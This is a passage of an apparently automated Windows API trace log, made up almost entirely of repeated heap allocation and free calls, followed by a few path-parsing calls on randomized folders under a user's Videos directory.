lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0195.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.820] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\") returned="EXZou4J4nw j\\" [0195.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0195.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.821] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\") returned="SVKL6Wu5uab uSVqvA\\" [0195.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0195.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0195.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0195.822] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\") returned="-DwrKzslsF2\\" [0195.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42808 [0195.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.822] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0195.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42808 | out: hHeap=0x6a0000) returned 1 [0195.822] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 